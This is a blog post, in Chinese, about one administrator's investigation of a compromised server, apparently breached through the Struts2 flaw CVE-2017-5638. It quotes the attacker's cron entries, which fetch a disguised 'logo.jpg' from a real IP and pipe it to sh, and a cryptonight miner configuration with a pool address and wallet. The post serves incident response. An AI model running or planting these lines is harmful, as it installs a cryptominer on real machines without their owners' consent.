公司一臺服務器從某一個時間開始，突然在每天不定期出現磁盤io和進程數的告警，初期進行查看，並未發現問題，暫時擱置。

每次告警時間都很短暫，所以很難在系統出現告警時登錄查看。而且由於在忙其他事情，這件事也一直沒有仔細去查。

登錄檢查的時候發現有一個分區磁盤滿了，當時猜測可能與分區使用滿了有關，但分區中的文件都不能移動，最終將部分文件做了軟鏈接到另一個分區，使分區使用率在100%以下，測試告警會不會繼續。

事實是告警沒有停止，依然在繼續。

通過性能監控工具nmon來進行查看，使用dtl參數，分別查看cpu，disk io，top processes，由於此時沒告警，系統運行正常，沒有看出什麽。

查看tomcat服務日誌，看在告警時間段內服務在幹什麽，發現服務跟告警沒有關系，基本上在告警時間，服務沒做什麽操作，這就說明不是服務造成系統負載變高，可能是有別的進程導致。查看系統進程，未發現可疑進程，略有疑惑。就在這時，回頭看了一眼nmon實時進程顯示，突然看到一個wget的進程，馬上使用ps查看wget進程，發現了這樣的進程

*/20 * * * * wget -O --q http://91.230.47.40/icons/logo.jpg|sh */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh

很明顯是計劃任務的書寫形式，查看計劃任務，果然有這兩條計劃任務，由於不確定這計劃任務是否是其他工作人員加上去的，先查看ip的歸屬，發現時俄羅斯的，反應到應該不是工作人員加的，而是被攻擊了。

再看top進程，發現還有另外一個進程，為atd，此進程是計劃任務相關的進程，馬上kill掉。

再把兩條計劃任務註釋掉。

使用電腦瀏覽器嘗試打開計劃任務的url，發現jpg問價你打開圖片，想到這應該不是圖片文件。在linux終端下載此文件，使用vi打開，發現是一個腳本：

打開配置文件/var/tmp/bmsnxvpggm.conf：

{

"url" : "stratum+tcp://94.23.41.130:80",

"user" : "49mQCzecsC6TS1sNBj5XQX4dNG8MESvLGLPHYJLKohVCQivAB5jJw2xHokTpjtSfE3D8m2U3JjDGEWJMYLrN216CM3dRpBt",

"pass" : "x",

"algo" : "cryptonight",

"quiet" : true

}

看起來有點像是做驗證，這應該是把服務做成肉雞了。

把相關文件清理。

查看歷史記錄，沒有發現其他可以操作。

上網查找有關類似的例子，發現真的有，這種攻擊可以通過struts2的一個漏洞（CVE-2017-5638 ），由於這臺服務器上的服務是比較久之前的服務，使用的struts2版本中有這樣的漏洞，所以可能是通過該漏洞進行攻擊的。

公司目前所有項目都已放棄使用struts2，而且該服務也已經不常用，初步考慮讓開發人員將此服務重新修改。

本文出自 “我不是我” 博客，請務必保留此出處http://wangwq.blog.51cto.com/8711737/1952727

記錄一次服務器被攻擊